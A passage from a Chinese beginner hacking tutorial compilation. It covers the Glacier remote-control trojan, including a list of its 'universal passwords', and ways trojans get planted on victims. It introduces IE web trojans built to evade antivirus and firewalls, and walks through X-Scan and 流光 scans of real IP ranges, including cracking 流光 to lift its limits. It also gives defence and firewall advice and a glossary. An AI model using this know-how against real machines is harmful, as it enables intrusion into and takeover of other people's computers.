口令是单向编码,所以编码后的口令是不可逆也是不唯一 的,冰河通过穷举算出来的口令可能与原口令不符,但也是有效口令。毛主席说过没有调查 就没有发言权,所以没有试过就千万别妄下定论; 7. 占用系统资源过高,其实准确的说应该是 CPU 利用率过高,系统资源占用并不算过分, 这主要是不断探测口令信息(敏感字符)造成的,所以在'DARKSUN 专版'中允许用户将该功 能屏蔽(我实在不知道怎样才能兼顾鱼和熊掌),只要在配置时清空'敏感字符'中的所有字符串 就行了。 8. 如何卸载冰河,这是我解答次数最多的一个问题,其实冰河 1.2 正式版以后的各版本都在 CLIENT 端提供了彻底的卸载功能。对于 1.2 版本,请执行命令列表中的'自动卸载'命令,对 其以后的版本,请执行'命令控制台'中的'控制类命令\系统控制\自动卸载冰河'。 小编有言:说说卸冰河木马方法和冰河的通用密码 很多朋友问我中了木马“冰河”有什么方法可以卸掉,其实很简单,有两个方法: (1)用杀毒软件“金山毒霸”就可以卸掉。但有朋友说用“金山”卸掉“冰河”后 打不开本文文件了,那你可以用手动方法去卸。如果你觉得那个办法太麻烦,可以用我介绍 的第二种方法。 57 (2)用“冰河”卸“冰河”: 如果你确定你的机器种了冰河,那你上网后开启冰河。 在增 添主机那里添自己的 IP。 然后电击自己的 IP, 选命令控制台那里选控制命令里的系统命 令。 然后自己看啦。不要再说你不会啊。我会晕的啊。:) 冰河通用密码 3.0 版:yzkzero.51.net 3.0 版:yzkzero! 3.1-netbug 版密码: 123456!@ 2.2 杀手专版:05181977 2.2 杀手专版:dzq2000! 文:残 了解如何种植木马才能防止别人种植木马。看看一般人用的手段。(本文比较适合入门级别 选手) 1.网吧种植 这个似乎在以前很流行,先关闭网吧的放火墙,再安装木马客户端,立刻结帐下机,注意, 重点是不要重起机器,因为现在网吧都有还原精灵,所以在不关机器的情况下,木马是不会 给发现的。因此,在网吧上网,首先要重起机器,其次看看杀毒软件有没有打开。最后建议, 不要在网吧打开有重要密码的东西,如网络银行等。毕竟现在木马客户端躲避防火墙的能力 很强,其次是还存在其他的病毒。 2.通讯软件传送 发一条消息给你,说,“这个我的照片哦,快看看。”当你接受并打开的时候,你已经中了木 马了。(此时,你打开的文件好象“没有任何反应”)“她”可能接着说说:“呀,发错了。再 见。”防御:不要轻易接受别人传的东西,其次是打开前要用杀毒软件查毒。 3.恐怖的捆绑 捆绑软件现在很多,具体使用就是把木马客户端和一个其他文件捆绑在一起(拿 JPG 图象 为例),你看到的文件可能是.jpg,图标也是正常(第 2 条直接传的木马客户端是个 windows 无法识别文件的图标,比较好认),特别是现在有些捆绑软件对捆绑过后的软件进行优化, 杀毒软件很难识别其中是否包含木马程序。建议:不要打开陌生人传递的文件。特别是图象 文件。(诱惑力大哦) 4.高深的编译 58 对木马客户程序进行编译。让木马更加难以识别。(其实效果同第三条) 5.微妙的网页嵌入 将木马安装在自己的主页里面,当你打开页面就自动下载运行。(见下篇,打造网页木马) “你中奖了,请去 www.**.com 领取你的奖品”,黑客可能这么和你说。建议:陌生人提供 的网页不要打开,不要去很奇怪名字的网站。及时升级杀毒软件。 总结:及时升级杀毒软件。不要打开未知文件以及陌生人传来的文件。不要随便打开陌生网 页。升级最新版本的操作系统。还有....请看本专题以后的文章咯。 ============================================================ 你也可以当黑客 打造完美的 IE 网页木马 (残语:比较适合黑客中级选手,日后将推出视频教程) 既然要打造完美的 IE 网页木马,首先就必须给我们的完美制定一个标准,我个人认为一个 完美的IE网页木马至少应具备下列四项特征: 一:可以躲过杀毒软件的追杀; 二:可以避开网络防火墙的报警; 三:能够适用于多数的 Windows 操作系统(主要包括 Windows 98、Windows Me、Windows 2000、Windows XP、Windows 2003)中的多数 IE 版本(主要包括 IE5.0、IE5.5、IE6.0), 最好能打倒 SP 补丁; 四:让浏览者不容易发觉 IE 变化,即可以悄无声息,从而可以长久不被发现。 (注意以上四点只是指网页本身而言,但不包括你的木马程序,也就是说我们的网页木马只 是负责运行指定的木马程序,至于你的木马程序的好坏只有你自己去选择啦!别找我要,我 不会写的哦!) 满足以上四点我想才可以让你的马儿更青春更长久,跑的更欢更快…… 看了上面的几点你是不是心动拉?别急,我们还是先侃侃现有的各种IE网页木马的不足 吧! 第一种:利用古老的 MIME 漏洞的IE网页木马 这种木马现在还在流行,但因为此漏洞太过古老且适用的IE版本较少,而当时影响又太大, 补丁差不多都补上啦,因此这种木马的种植成功率比较低。 59 第二种:利用 com.ms.activeX.ActiveXComponent 漏洞,结合WSH及FSO控件的IE网 页木马 虽然 com.ms.activeX.ActiveXComponent 漏洞广泛存在于多数IE版本中,是一个比较好的 漏洞,利用价值非常高,但却因为它结合了流行的病毒调用的WSH及FSO控件,使其虽 说可以避开网络防火墙的报警,可逃不脱杀毒软件的追捕(如诺顿)。 第三种:利用 OBJECT 对象类型确认漏洞(ObjectDataRemote)并结合 WSH及FSO控件的IE网页木马(典型的代表有动鲨网页木马生成器) 此种木马最大的优点是适应的IE版本多,且漏洞较新,但却有如下不足: 1、因为此漏洞要调用 Mshta.exe 来访问网络下载木马程序,所以会引起防火墙报警(如天 网防火墙); 2、如果此IE网页木马又利用了WSH及FSO控件,同样逃不脱杀毒软件的追捕(如诺 顿),而动鲨网页木马又恰恰使用了WSH及FSO控件,叹口气……可惜呀……? 3、再有就是这个漏洞需要网页服务器支持动态网页如ASP、JSP、CGI等,这就影 响了它的发挥,毕竟现在的免费稳定的动态网页空间是少之又少;虽说此漏洞也可利用邮件 MIME的形式来利用,但经测试发现对IE6.0不起作用。 看到上面的分析你是不是有了这种感觉:千军易得,一将难求,马儿成群,奈何千里马难寻! 别急,下面让我带这大家一起打造我心中的完美IE网页木马。 ======================================================= 扫描器的使用 这里我使用 x-scanner 作为介绍对象,原因是 x-scanner 集成了多种扫描功能于一身,它可以 采用多线程方式对指定 IP 地址段(或独立 IP 地址)进行安全漏洞扫描,提供了图形界面和 命令行两种操作方式,扫描内容包括:标准端口状态及端口 banner 信息、CGI 漏洞、RPC 漏洞、SQL-SERVER 默认帐户、FTP 弱口令,NT 主机共享信息、用户信息、组信息、NT 主机弱口令用户等。扫描结果保存在/log/目录中,index_*.htm 为扫描结果索引文件。对于 一些已知的 CGI 和 RPC 漏洞,x-scanner 给出了相应的漏洞描述、利用程序及解决方案,节 省了查找漏洞介绍的时间。 首先 x-scanner 包括了两个运行程序:xscann.exe 和 xscan_gui.exe,这两个程序分别是扫描器 的控制台版本和窗口版本,作为初学者可能更容易接受窗口版本的扫描软件,因为毕竟初学 者使用最多的还是“应用程序”,无论运行那一个版本,他们的功能都是一样的。首先让我 们运行窗口版本看看:窗口分为左右两部分,左面是进行扫描的类型,这包括前面提到的漏 洞扫描、端口扫描等基本内容;另一部分是有关扫描范围的设定,xscanner 可以支持对多个 IP 地址的扫描,也就是说使用者可以利用 xscanner 成批扫描多个 IP 地 址 ,例 如在 IP 地址范 60 围内输入 211.100.8.1-211.100.8.255 就会扫描整个 C 类的 255 台服务器(如果存在的话),这 样黑客可以针对某一个漏洞进行搜索,找到大范围内所有存在某个漏洞的服务器。当然如果 只输入一个 IP 地址,扫描程序将针对单独 IP 进行扫描。 剩下的端口设定在前面已经介绍过,一般对于网站服务器,这个端口选取 80 或者 8080,对 于某些特殊的服务器也许还有特殊的端口号,那需要通过端口扫描进行寻找。多线程扫描是 这个扫描器的一大特色,所谓多线程就是说同时在本地系统开辟多个 socket 连接,在同一 时间内扫描多个服务器,这样做的好处是提高了扫描速度,节省时间,根据系统的资源配置 高低,线程数字也可以自行设定(设定太高容易造成系统崩溃)。 在图形界面下我们看到了程序连接地址“.\xscan.exe”,这实际上就是 xscanner 的控制台程序, 也就是说图形窗口只是将控制台扫描器的有关参数设置做了“傻瓜化”处理,程序运行真正 执行的还是控制台程序。因此学习控制台是黑客所必需的,而且使用控制台模式的程序也是 真正黑客喜爱的操作方式。 现在我们进行一个简单的 cgi 漏洞扫描,这次演练是在控制台模式下进行的:xscan 211.100.8.87 -port 这个命令的意思是让 xscanner 扫描服务器 211.100.8.87 的开放端口,扫描器不会对 65535 个 端口全部进行扫描(太慢),它只会检测网络上最常用的几百个端口,而且每一个端口对应 的网络服务在扫描器中都已经做过定义,从最后返回的结果很容易了解服务器运行了什么网 络服务。扫描结果显示如下: Initialize dynamic library succeed. Scanning 211.100.8.87 ...... [211.100.8.87]: Scaning port state ... [211.100.8.87]: Port 21 is listening!!! [211.100.8.87]: Port 25 is listening!!! [211.100.8.87]: Port 53 is listening!!! [211.100.8.87]: Port 79 is listening!!! [211.100.8.87]: Port 80 is listening!!! [211.100.8.87]: Port 110 is listening!!! [211.100.8.87]: Port 3389 is listening!!! [211.100.8.87]: Port scan completed, found 7. 61 [211.100.8.87]: All done. 这个结果还会同时在 log 目录下生成一个 html 文档,阅读文档可以了解发放的端口对应的 服务项目。从结果中看到,这台服务器公开放了七个端口,主要有 21 端口用于文件传输、 80 端口用于网页浏览、还有 110 端口用于 pop3 电子邮件,如此一来,我们就可以进行有关 服务的漏洞扫描了。(关于端口的详细解释会在后续给出) 然后可以使用浏览看看这个服务器到底是做什么的,通过浏览发现原来这是一家报社的电子 版面,这样黑客可以继续对服务器进行漏洞扫描查找服务器上是否存在 perl 漏洞,之后进 行进一步进攻。 漏洞扫描的道理和端口扫描基本上类似,例如我们可以通过扫描器查找 61.135.50.1 到 61.135.50.255 这 255 台服务器上所有开放了 80 端口的服务器上是否存在漏洞,并且找到存 在什么漏洞,则可以使用 xscan 61.135.50.1-61.135.50.255 -cgi 进行扫描,因为结果比较多, 通过控制台很难阅读,这个时候 xscanner 会在 log 下生成多个 html 的中文说明,进行阅读 这些文档比较方便。 二、扫描器使用问题: 载使用漏洞扫描器的过程中,学习者可能会经常遇到一些问题,这里给出有关问题产生的原 因和解决办法。扫描器的使用并不是真正黑客生涯的开始,但它是学习黑客的基础,所以学 习者应该多加练习,熟练掌握手中使用的扫描器,了解扫描器的工作原理和问题的解决办法。 1、为什么我找不到扫描器报告的漏洞? 扫描器报告服务器上存在某个存在漏洞的文件,是发送一个 GET 请求并接收服务器返回值 来判断文件是否存在,这个返回值在 HTTP 的协议中有详细的说明,一般情况下“200”是 文件存在,而“404”是没有找到文件,所以造成上面现象的具体原因就暴露出来了。 造成这个问题的原因可能有两种:第一种可能性是您的扫描器版本比较低,扫描器本身存在 “千年虫”问题,对于返回的信息扫描器在判断的时候,会错误的以为时间信息 2000 年 x 月 x 日中的 200 是“文件存在”标志,这样就会造成误报; 另外一种可能性是服务器本身对“文件不存在”返回的头部信息进行了更改,如果 GET 申 请的文件不存在,服务器会自动指向一个“没有找到页面”的文档,所以无论文件是否存在, 都不会将“404”返回,而是仍然返回成功信息,这样做是为了迷惑漏洞扫描器,让攻击者 不能真正判断究竟那个漏洞存在于服务器上。 这一问题的解决办法也要分情况讨论,一般说来第一种情况比较容易解决,直接升级漏洞扫 描器就可以了,对于第二种情况需要使用者对网络比较熟悉,有能力的话可以自己编写一个 漏洞扫描器,自己编写的扫描器可以针对返回文件的大小进行判断,这样就可以真正确定文 件是否存在,但这种方法对使用者的能力要求较高。 62 2、我使用的扫描器速度和网络速度有关系嘛? 关系不大。扫描器发送和接收的信息都很小,就算是同时发送上百个 GET 请求一般的电话 上网用户也完全可以做得到,影响扫描器速度的主要因素是服务器的应答速度,这取决于被 扫描服务器的系统运行速度。如果使用者希望提高自己的扫描速度,可以使用支持多线程的 扫描器,但是因为使用者本地电脑档次问题,也不可能将线程设置到上百个,那样的话会造 成本地系统瘫痪,一般使用 30 个线程左右比较合适。 另外对于很多网络服务器来说,为了防止黑客的扫描行为,可能会在防火墙上设置同一 IP 的单位时间 GET 申请数量,这样做目的就是避免黑客的扫描和攻击,所以在提高本地扫描 速度之前,应该先确认服务器没有相应的过滤功能之后再使用。 3、扫描器报告给我的漏洞无法利用是什么原因? 确切地说扫描器报告的不是“找到的漏洞”,而是找到了一个可能存在漏洞的文件,各种网 络应用程序都可能存在漏洞,但是在更新版本的过程中,老版本的漏洞会被修补上,被扫描 器找到的文件应该经过手工操作确认其是否是存在漏洞的版本,这可以通过阅读网络安全网 站的“安全公告”获得相应知识。 对于已经修补上漏洞的文件来说,也不代表它一定不再存有漏洞,而只能说在一定程度上没 有漏洞了,也许在明天,这个新版本的文件中又会被发现还存在其他漏洞,因此这需要网络 安全爱好者时刻关注安全公告。当然如果攻击者或者网络管理员对编程比较熟悉,也可以自 己阅读程序并力图自己找到可能的安全隐患,很多世界著名的黑客都是不依*他人,而是自 己寻找漏洞进行攻击的。 4、扫描器版本比较新,然而却从来没有找到过漏洞是什么原因? 有一些扫描器专门设计了“等待时间”,经过设置可以对等待返回信息的时间进行调整,这 就是说在“网络连接超时”的情况下,扫描器不会傻傻的一直等待下去。但如果你的网络速 度比较慢,有可能造成扫描器没有来得及接收返回信息就被认为“超时”而越了过去继续下 面的扫描,这样当然是什么也找不到啦。 如果问题真的如此,可以将等待时间设置的长一些,或者换个 ISP 拨号连接。 5、扫描器报告服务器没有提供 HTTP 服务? 网络上大多数 HTTP 服务器和漏洞扫描器的默认端口都是 80,而有少量的 HTTP 服务器并 不是使用 80 端口提供服务的,在确认服务器的确开通了网站服务的情况下,可以用端口扫 描器察看一下对方究竟使用什么端口进行的 HTTP 服务,网络上常见的端口还有 8080。 另外这种情况还有一种可能性,也许是使用者对扫描器的参数设置不正确造成的,很多扫描 器的功能不仅仅是漏洞扫描,有可能还提供了 rpc 扫描、ftp 默认口令扫描和 NT 弱口令扫描 等多种功能,因此在使用每一款扫描器之前,都应该自己阅读有关的帮助说明,确保问题不 是出在自己身上。 63 6、扫描器使用过程中突然停止响应是为什么? 扫描器停止响应是很正常的,有可能是因为使用者连接的线程过多,本地系统资源不足而造 成系统瘫痪、也可能是因为对方服务器的响应比较慢,依次发送出去的请求被同时反送回来 而造成信息阻塞、还有可能是服务器安装了比较恶毒的防火墙,一旦察觉有人扫描就发送特 殊的数据报回来造成系统瘫痪…… 因此扫描器停止响应不能简单的说是为什么,也没有一个比较全面的解决方案,不过一般情 况下遇到这种问题,我建议你可以更换其他扫描器、扫描另外一些服务器试试,如果问题还 没有解决,就可能是因为扫描器与你所使用的系统不兼容造成的,大多数基于微软视窗的漏 洞扫描器都是运行在 Windows9X 下的,如果是 Win2000 或者 NT 也有可能造成扫描器无法 正常工作。 7、下载回来的扫描器里面怎么没有可执行文件? 扫描器不一定非要是可执行的 exe 文件,其他例如 perl、cgi 脚本语言也可以编写扫描器, 因此没有可执行文件的扫描器也许是运行在网络服务器上的,这种扫描器可以被植入到网络 上的其它系统中,不需要使用者上网就能够 24 小时不停的进行大面积地址扫描,并将结果 整理、分析,最后通过 Email 发送到指定的电子信箱中,因此这是一种比较高级的扫描器, 初学者不适合使用。 另外注意载下在扫描器的时候注意压缩报文件的扩展名,如果是 tar 为扩展名,那么这个扫 描器是运行在 Linux 系统下的,这种其它操作平台的扫描器无法在视窗平台下应用,文件格 式也和 FAT32 不一样。 8、扫描器只报告漏洞名称,不报告具体文件怎么办? 只要漏洞被发现,网络安全组织即会为漏洞命名,因此漏洞名称对应的文件在相当广泛的范 围内都是统一的,只要知道了漏洞的名称,黑客就可以通过专门的漏洞搜索引擎进行查找, 并且学习到与找到漏洞相关的详细信息。这种“漏洞搜索引擎”在网络上非常多,例如我国 “绿盟”提供的全中文漏洞搜索引擎就是比较理想的一个。 =========================================================== 如何防范黑客 黑客对服务器进行扫描是轻而易举的,一旦找到了服务器存在的问题,那么后果将是严重的。 这就是说作为网络管理员应该采取不要的手段防止黑客对服务器进行扫描,本节我将谈谈如 何才能让自己的服务器免遭黑客扫描。 一、防范黑客心得体会: 1、屏蔽可以 IP 地址: 64 这种方式见效最快,一旦网络管理员发现了可疑的 IP 地址申请,可以通过防火墙屏蔽相对 应的 IP 地址,这样黑客就无法在连接到服务器上了。但是这种方法有很多缺点,例如很多 黑客都使用的动态 IP,也就是说他们的 IP 地址会变化,一个地址被屏蔽,只要更换其他 IP 仍然可以进攻服务器,而且高级黑客有可能会伪造 IP 地址,屏蔽的也许是正常用户的地址。 2、过滤信息包: 通过编写防火墙规则,可以让系统知道什么样的信息包可以进入、什么样的应该放弃,如此 一来,当黑客发送有攻击性信息包的时候,在经过防火墙时,信息就会被丢弃掉,从而防止 了黑客的进攻。但是这种做法仍然有它不足的地方,例如黑客可以改变攻击性代码的形态, 让防火墙分辨不出信息包的真假;或者黑客干脆无休止的、大量的发送信息包,知道服务器 不堪重负而造成系统崩溃。 3、修改系统协议: 对于漏洞扫描,系统管理员可以修改服务器的相应协议,例如漏洞扫描是根据对文件的申请 返回值对文件存在进行判断的,这个数值如果是 200 则表示文件存在于服务器上,如果是 404 则表明服务器没有找到相应的文件,但是管理员如果修改了返回数值、或者屏蔽 404 数 值,那么漏洞扫描器就毫无用处了。 4、经常升级系统版本: 任何一个版本的系统发布之后,在短时间内都不会受到攻击,一旦其中的问题暴露出来,黑 客就会蜂拥而致。因此管理员在维护系统的时候,可以经常浏览著名的安全站点,找到系统 的新版本或者补丁程序进行安装,这样就可以保证系统中的漏洞在没有被黑客发现之前,就 已经修补上了,从而保证了服务器的安全。 5、及时备份重要数据: 亡羊补牢,如果数据备份及时,即便系统遭到黑客进攻,也可以在短时间内修复,挽回不必 要的经济损失。想国外很多商务网站,都会在每天晚上对系统数据进行备份,在第二天清晨, 无论系统是否收到攻击,都会重新恢复数据,保证每天系统中的数据库都不会出现损坏。数 据的备份最好放在其他电脑或者驱动器上,这样黑客进入服务器之后,破坏的数据只是一部 分,因为无法找到数据的备份,对于服务器的损失也不会太严重。 然而一旦受到黑客攻击,管理员不要只设法恢复损坏的数据,还要及时分析黑客的来源和攻 击方法,尽快修补被黑客利用的漏洞,然后检查系统中是否被黑客安装了木马、蠕虫或者被 黑客开放了某些管理员账号,尽量将黑客留下的各种蛛丝马迹和后门分析清除、清除干净, 防止黑客的下一次攻击。 6、使用加密机制传输数据: 对于个人信用卡、密码等重要数据,在客户端与服务器之间的传送,应该仙经过加密处理在 65 进行发送,这样做的目的是防止黑客监听、截获。对于现在网络上流行的各种加密机制,都 已经出现了不同的破解方法,因此在加密的选择上应该寻找破解困难的,例如 DES 加密方 法,这是一套没有逆向破解的加密算法,因此黑客的到了这种加密处理后的文件时,只能采 取暴力破解法。个人用户只要选择了一个优秀的密码,那么黑客的破解工作将会在无休止的 尝试后终止。 二、防火墙使用说明: 1.什么是防火墙? 防火墙的英文叫做 firewall,它能够在网络与电脑之间建立一道监控屏障,保护在防火墙内 部的系统不受网络黑客的攻击。逻辑上讲,防火墙既是信息分离器、限制器,也是信息分析 器,它可以有效地对局域网和 Internet 之间的任何活动进行监控,从而保证局域网内部的安 全。 网络上最著名的软件防火墙是 LockDown2000,这套软件需要经过注册才能获得完整版本, 它的功能强大,小到保护个人上网用户、大到维护商务网站的运作,它都能出色的做出惊人 的表现。但因为软件的注册需要一定费用,所以对个人用户来说还是选择一款免费的防火墙 更现实。天网防火墙在这里就更加适合个人用户的需要了,天网防火墙个人版是一套给个人 电脑使用的网络安全程序,它能够抵挡网络入侵和攻击,防止信息泄露。 2、天网防火墙的基本功能: 天网防火墙个人版把网络分为本地网和互联网,可以针对来自不同网络的信息,来设置不同 的安全方案,以下所述的问题都是针对互联网而言的,故所有的设置都是在互联网安全级别 中完成的。 怎样防止信息泄露? 如果把文件共享向互联网开放,而且又不设定密码,那么 别人就可以轻松的通过互联网看到您机器中的文件,如果您还允许共享可写,那别人甚至可 以删除文件。 你可以在个人防火墙的互联网安全级别设置中,将 NETBIOS 关闭,这样别 人就不能通过 INTERNET 访问你的共享资源了(这种设置不会影响你在局域网中的资源共 享 )。 当拨号用户上网获得了分配到的 IP 地址之后,可以通过天网防火墙将 ICMP 关闭,这样黑 客用 PING 的方法就无法确定使用者的的系统是否处于上网状态,无法直接通过 IP 地址获 得使用者系统的信息了。 需要指出的是:防火墙拦截的信息并不完全是攻击信息,它记录的只是系统在安全设置中所 拒绝接收的数据包。在某些情况下,系统可能会收到一些正常但又被拦截的数据包,例如某 些路由器会定时发出一些 IGMP 包等;或有些主机会定时 PING 出数据到本地系统确认连接 仍在维持着,这个时候如果利用防火墙将 ICMP 和 IGMP 屏蔽了,就会在安全记录中见到这 些被拦截的数据包,因此这些拦截下来的数据包并不一定是黑客对系统进行攻击造成的。 3、使用防火墙的益处: 使用防火墙可以保护脆弱的服务,通过过滤不安全的服务,Firewall 可以极大地提高网络安 66 全和减少子网中主机的风险。例如,Firewall 可以禁止 NIS、NFS 服务通过,同时可以拒绝 源路由和 ICMP 重定向封包。 另外防火墙可以控制对系统的访问权限,例如某些企业允许从外部访问企业内部的某些系 统,而禁止访问另外的系统,通过防火墙对这些允许共享的系统进行设置,还可以设定内部 的系统只访问外部特定的 Mail Server 和 Web Server,保护企业内部信息的安全。 4、防火墙的种类: 防火墙总体上分为包过滤、应用级网关和代理服务器等三种类型: (1)数据包过滤 数据包过滤(Packet Filtering)技术是在网络层对数据包进行选择,选择的依据是系统内设置的 过滤逻辑,被称为访问控制表(Access Control Table)。通过检查数据流中每个数据包的源地 址、目的地址、所用的端口号、协议状态等因素,或它们的组合来确定是否允许该数据包通 过。 数据包过滤防火墙逻辑简单,价格便宜,易于安装和使用,网络性能和透明性好,它 通常安装在路由器上。路由器是内部网络与 Internet 连接必不可少的设备,因此在原有网络 上增加这样的防火墙几乎不需要任何额外的费用。 数据包过滤防火墙的缺点有二:一是非法访问一旦突破防火墙,即可对主机上的软件和配置 漏洞进行攻击;二是数据包的源地址、目的地址以及 IP 的端口号都在数据包的头部,很有 可能被窃听或假冒。 (2)应用级网关 应用级网关(Application Level Gateways)是在网络应用层上建立协议过滤和转发功能。它针 对特定的网络应用服务协议使用指定的数据过滤逻辑,并在过滤的同时,对数据包进行必要 的分析、登记和统计,形成报告。实际中的应用网关通常安装在专用工作站系统上。 数据包过滤和应用网关防火墙有一个共同的特点,就是它们仅仅依*特定的逻辑判定是否允 许数据包通过。一旦满足逻辑,则防火墙内外的计算机系统建立直接联系,防火墙外部的用 户便有可能直接了解防火墙内部的网络结构和运行状态,这有利于实施非法访问和攻击。 (3)代理服务 代理服务(Proxy Service)也称链路级网关或 TCP 通道(Circuit Level Gateways or TCP Tunnels),也有人将它归于应用级网关一类。它是针对数据包过滤和应用网关技术存在的缺 点而引入的防火墙技术,其特点是将所有跨越防火墙的网络通信链路分为两段。防火墙内外 计算机系统间应用层的" 链接",由两个终止代理服务器上的" 链接"来实现,外部计算机的 网络链路只能到达代理服务器,从而起到了隔离防火墙内外计算机系统的作用。此外,代理 服务也对过往的数据包进行分析、注册登记,形成报告,同时当发现被攻击迹象时会向网络 管理员发出警报,并保留攻击痕迹 67 ========================================================= 黑客之“名词介绍” 1.肉鸡,或者留了后门,可以被我们远程操控的机器,现在许多人把有 WEBSHELL 权限的 机器也叫肉鸡。 2、木马:特洛伊木马,大家在电影《特洛伊》里应该看到了,战争是特络伊故意留下了个 木马,多方以为是战利品,带回城后,木马里面全是战士,这种东西,就叫做木马,可以说 木马就是一方给肉鸡留下的东西,可以做到远程控制的目的,木马还分不同的作用,有盗号 专用的木马,有远程控制专用的木马,下面介绍点:盗号专用的有许多,盗 QQ 的有 啊拉 QQ 大盗,强强盗 QQ,传奇木马生成器,魔兽木马生成器等;远程控制的木马有:冰河(国 人的骄傲,中国第一款木马),灰鸽子,PCshare,网络神偷,FLUX 等,现在通过线程插入 技术的木马也有很多,大家自己找找吧。 3、病毒:这个我想不用解释了吧,相信大家都和它打过交道,病毒大多具有破坏性,传播 性,隐秘性,潜伏性。 4、后门:这个就是入侵后为方便我们下次进入肉鸡方便点所留下的东西,亲切的称为后门, 现在好点的后门有 REDMAIN 等。 5、CRACK:这个名词很容易和 HACK 混淆,但是许多人不理解 CRACK 这个东西,但是 接触过软件破解的人一定了解这个词 CRACKER 分析下就是软件破解者的意思(注意这里 有多了个 ER),许多共享软件就是我们的 CRACKER 来完成破解的,就是现在俗称的 XX 软 件破解版。 6、漏洞:这个名词相信也不用太多的介绍,根据字面意思也可以理解,就好象一个房子, 门很结实,可是有个窗户却不好,这就很可能造成被别人进入,入侵是也是相对的,必须要 有漏洞才可以入侵,这里顺便介绍下打补丁的意思,还是用上面的例子门很结实,可窗户不 好,这里我们需要把窗户补上,就叫打补丁了,许多人问过我怎样知道自己的机器有漏洞? 怎样打补丁?这里也回答下,首先介绍怎样检查自己奇迹有什么样的漏洞,有款工具简称为 MBSA 是微软公司针对 windows 系统的安全检测工具,大家可以去网上找到自己下下来检 测下自己机器有什么样的漏洞,还介绍下微软的漏洞名称 MS05-001 MS05-002 这种形式的 前面 MS 应为是微软的意思吧,05 呢是 2005 年,001 是在 2005 年第一个漏洞(不知道解释 的对不,自己的理解)大家还可以下个金山毒霸,金山可以有个漏洞检测功能,还可以帮你 补上相应的补丁,那么怎么打补丁呢?其实这个很简单,在微软的官方网站里可以输入 MS05-001(如果你有这个漏洞的话)微软就找出了响应的补丁,下载下来 安装下其实就可以 了,呵呵,打补丁也不是什么困难的事情哦。 7、端口:这个是入侵是很重要的一个环节,端口这个东西就好象是我要买东西,需要在 1 号窗口来结帐,而开放的 1 号窗口就好比响应的端口,端口可以形象的比喻成窗口,呵呵, 不同的端口开放了不同的服务,大家可以在网上找到端口对照表来看下不同的端口开放的是 什么服务。 68 8、权限:这个东西和人权一个效果,我们有自己的权利,但是我们的权利不能超出自己的 范围,比如法律可以控制人的生命,这种最高权限呢就是计算机中的 Admin 权限 最高权限, 法官呢是执行法律的人,比法律底点,这个呢就是 SYSTEM 权限,系统权限,以下每种人 有着自己不同的权限,比如我们得到了个 WEBSHELL 权限,许多人不知道这个是什么权限, 其实就是个 WEB(网业)的管理权限,权限一般比较低,但是有时想得到个服务器的 ADMIN 权限,就可以先丛 WEBSHELL 权限来入手,也就是长说的提权。 ================================================== 黑客利器流光使用技巧 流光这款软件除了能够像 X-Scan 那样扫描众多 漏洞、弱口令外,还集成了常用的入侵工具, 如字典工具、NT/IIS 工具等,还独创了能够控制“肉鸡”进行扫描的“流光 Sensor 工具” 和为“肉鸡”安装服务的“种植者”工具。 与 X-Scan 相比,流光的功能多一些,但操作起来难免繁杂。由于流光的功能过于强大,而 且功能还在不断扩充中,因此流光的作者小榕限制了流光所能扫描的 IP 范围,不允许流光 扫描国内 IP 地址,而且流光测试版在功能上也有一定的限制。但是,入侵者为了能够最大 限度地使用流光,在使用流光之前,都需要用专门的破解程序对流光进行破解,去除 IP 范 围和功能上的限制。 安装与打补丁完成后,打开流光,界面如图所示。 实例:使用流光高级扫描功能检测 210.□.□.2 到 210.□.□.253 网段主机的系统缺陷 步骤一:打开高级扫描向导、设置扫描参数。 在流光 4.7 主界面下,通过选择“文件(F)”→“ 高 级 扫 描 向 导( W)”或使用快捷健“Ctrl+W” 打开高级扫描向导。在“起始地址”和“结束地址”分别填入目标网段主机的开始和结束 IP 地址;在“目标系统”中选择预检测的操作系统类型;在“获取主机名”、“PING 检查” 前面打钩;在“检测项目”中,选择“全选”;选好后如图所示。[morningsky] 然后单击“下一步(N)”按钮,在图中选中“标准端口扫描”。 说明: 69 “标准端口扫描”:只对常见的端口进行扫描。 “自定端口扫描范围”:自定义端口范围进行扫描。 然后单击“下一步(N)”按钮,在图中进行设置。 设置好所有检测项目后,然后单击“下一步(N)”按钮来到图界面,选择“本地主机”,表 示使用本机执行扫描任务。 步骤二:开始扫描。 在图 1-69 中单击“开始(S)”按钮进行扫描。在扫描过程中,如果想要停止,通过单击最 下角的“取消”按钮来实现,不过需要相当一段时间才能真正地停止,所以建议一次不要扫 太大的网段,如果因扫描时间过长而等不及,这时候再想让流光停下来是不容易的。 步骤三:查看扫描报告。 扫描结束后,流光会自动打开 HTML 格式的扫描报告,如图所示。 需要指出的是,在扫描完成后,流光不仅把扫描结果整理成报告文件,而且还把可利用的主 机列在流光界面的最下方,如图所示。 木马工具详解+入门工具使用 现在我们来看看木马在黑客学习中的作用。首先学习者要明确木马究竟是什么,同时还要搞 清楚木马的类型,并且学习一些流行的木马程序的用法,这是一个相辅相成的学习进程,当 黑客利用漏洞进入服务器之后,就可以选择两条路:一、破坏系统、获得资料、显示自己; 二、利用木马为自己开辟一个合法的登录账号、掌管系统、利用被入侵系统作为跳板继续攻 击其他系统。 由此看来,木马程序是为第二种情况涉及的一种可以远程控制系统的程序,根据实现木马程 序的目的,可以知道这种程序应该具有以下性质: 1、伪装性:程序将自己的服务端伪装成合法程序,并且具有诱惑力的让被攻击者执行,在 程序被激活后,木马代码会在未经授权的情况下运行并装载到系统开始运行进程中; 2、隐藏性:木马程序通病毒程序一样,不会暴露在系统进程管理器内,也不会让使用者察 70 觉到木马的存在,它的所有动作都是伴随其他程序的运行进行的,因此在一般情况下使用者 很难发现系统中木马的存在; 3、破坏性:通过远程控制,黑客可以通过木马程序对系统中的文件进行删除、编辑操作, 还可以进行诸如格式化硬盘、改变系统启动参数等恶性破坏操作; 4、窃密性:木马程序最大的特点就是可以窥视被入侵电脑上的所有资料,这不仅包括硬盘 上的文件,还包括显示器画面、使用者在操作电脑过程中在硬盘上输入的所有命令等。 看了上面的介绍,学习者应该对木马程序的用途有了一个初步了解,并且区分清除木马程序 和病毒之间的相同点和不同点,由于黑客手段的日益增多,许多新出现的黑客手段(例如 D.O.S)经常会让学习者思维混乱,但实际上这些新出现的黑客手段都是从最开始的溢出、 木马演变出来的,因而对于初学者来说,并不需要急于接触过多的新技术,而是要对最基本 的也是最有效的黑客技术进行深入学习。 一、木马的原理: 大多数木马程序的基本原理都是一样的,他们是由两个程序配合使用——被安装在入侵系统 内的 Server 程序;另一个是对 Server 其控制作用的 Client 程序。学习者已经了解了木马和 病毒的区别,大多数 Server 程序不会像病毒一样主动传播,而是潜伏在一些合法程序内部, 